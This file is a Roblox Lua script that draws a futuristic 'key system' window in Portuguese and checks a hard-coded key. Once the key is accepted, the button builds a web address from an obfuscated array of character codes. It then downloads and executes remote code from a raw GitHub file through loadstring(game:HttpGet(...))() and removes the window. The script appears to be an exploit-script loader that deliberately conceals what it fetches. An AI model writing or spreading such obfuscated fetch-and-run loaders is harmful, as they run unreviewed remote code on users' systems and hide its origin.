local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.new(0.1, 0.1, 0.1)
Frame.Size = UDim2.new(0, 600, 0, 300)
Frame.Position = UDim2.new(0.5, -300, 0.5, -150)
Frame.Active = true
Frame.Draggable = true
Frame.BorderSizePixel = 5
Frame.BorderColor3 = Color3.new(0, 1, 1)
Frame.BackgroundTransparency = 0.3

local UICorner = Instance.new("UICorner")
UICorner.Parent = Frame
UICorner.CornerRadius = UDim.new(0, 15)

local UIGradient = Instance.new("UIGradient")
UIGradient.Parent = Frame
UIGradient.Color = ColorSequence.new({
    ColorSequenceKeypoint.new(0.0, Color3.fromRGB(0, 255, 255)),
    ColorSequenceKeypoint.new(1.0, Color3.fromRGB(0, 128, 255))
})

local Title = Instance.new("TextLabel")
Title.Parent = Frame
Title.Size = UDim2.new(1, 0, 0.2, 0)
Title.Position = UDim2.new(0, 0, 0, 0)
Title.Text = "Sistema de Chave Futurista"
Title.TextColor3 = Color3.new(1, 1, 1)
Title.BackgroundTransparency = 1
Title.Font = Enum.Font.SourceSansBold
Title.TextSize = 32
Title.TextStrokeTransparency = 0

local SubTitle = Instance.new("TextLabel")
SubTitle.Parent = Frame
SubTitle.Size = UDim2.new(1, 0, 0.1, 0)
SubTitle.Position = UDim2.new(0, 0, 0.2, 0)
SubTitle.Text = "Insira sua chave abaixo:"
SubTitle.TextColor3 = Color3.new(1, 1, 1)
SubTitle.BackgroundTransparency = 1
SubTitle.Font = Enum.Font.SourceSans
SubTitle.TextSize = 24

local TextBoxFrame = Instance.new("Frame")
TextBoxFrame.Parent = Frame
TextBoxFrame.Size = UDim2.new(0.9, 0, 0.15, 0)
TextBoxFrame.Position = UDim2.new(0.05, 0, 0.35, 0)
TextBoxFrame.BackgroundColor3 = Color3.new(0.15, 0.15, 0.15)
TextBoxFrame.BackgroundTransparency = 0.5
TextBoxFrame.BorderSizePixel = 0

local KeyInput = Instance.new("TextBox")
KeyInput.Parent = TextBoxFrame
KeyInput.Size = UDim2.new(1, 0, 1, 0)
KeyInput.Text = ""
KeyInput.PlaceholderText = "Digite a chave..."
KeyInput.TextColor3 = Color3.new(1, 1, 1)
KeyInput.BackgroundTransparency = 1
KeyInput.Font = Enum.Font.SourceSans
KeyInput.TextSize = 24
KeyInput.ClearTextOnFocus = false

local UICornerTextbox = Instance.new("UICorner")
UICornerTextbox.Parent = TextBoxFrame
UICornerTextbox.CornerRadius = UDim.new(0, 10)

local ConfirmButton = Instance.new("TextButton")
ConfirmButton.Parent = Frame
ConfirmButton.Size = UDim2.new(0.3, 0, 0.15, 0)
ConfirmButton.Position = UDim2.new(0.35, 0, 0.55, 0)
ConfirmButton.Text = "Enviar"
ConfirmButton.TextColor3 = Color3.new(1, 1, 1)
ConfirmButton.BackgroundColor3 = Color3.new(0, 0.6, 0.6)
ConfirmButton.Font = Enum.Font.SourceSansBold
ConfirmButton.TextSize = 24
ConfirmButton.BackgroundTransparency = 0.1

local UICornerButton = Instance.new("UICorner")
UICornerButton.Parent = ConfirmButton
UICornerButton.CornerRadius = UDim.new(0, 10)

local InfoLabel = Instance.new("TextLabel")
InfoLabel.Parent = Frame
InfoLabel.Size = UDim2.new(1, 0, 0.15, 0)
InfoLabel.Position = UDim2.new(0, 0, 0.85, 0)
InfoLabel.Text = "Chave válida: N/A"
InfoLabel.TextColor3 = Color3.new(1, 1, 1)
InfoLabel.BackgroundTransparency = 1
InfoLabel.Font = Enum.Font.SourceSans
InfoLabel.TextSize = 20

-- Função para validar a chave inserida
KeyInput.FocusLost:Connect(function(enterPressed)
    if enterPressed then
        local valid = KeyInput.Text == "Key_A.SEO8CJ<%289÷2]8YE199DJPSSAMMMMDLDKFJFO20Ij"
        InfoLabel.Text = valid and "Chave válida: Sim" or "Chave válida: Não"
        InfoLabel.TextColor3 = valid and Color3.new(0, 1, 0) or Color3.new(1, 0, 0)
        if valid then
            ConfirmButton.Text = "CHAVE 🔑"
            ConfirmButton.MouseButton1Click:Connect(function()
                local parts = {104, "t", 116, "p", 115, ":", 47, 47, "r", 97, "w", 46, "g", 105, "t", 104, "u", 98, "u", 115, "e", 114, "c", 111, 110, "t", 101, 110, "t", 46, "c", 111, "m", 47, "S", 65, "M", 85, "C", 65, "R", 65, "R", 79, "N", 79, "B", 47, "-", 57, "3", 57, "3", 105, "e", 47, "r", 101, "f", 115, 47, "h", 101, "a", 100, "s", 47, "m", 97, "i", 110, 47, "S", 101, "u", "-", 115, "i", 116, "e", 46, "c", 111, "m"}

                local function assembleURL(parts)
                    local url = ""
                    for _, part in ipairs(parts) do
                        url = url .. (type(part) == "string" and part or string.char(part))
                    end
                    return url
                end

                loadstring(game:HttpGet(assembleURL(parts)))()

                ScreenGui:Destroy()
            end)
        end
    end
end)
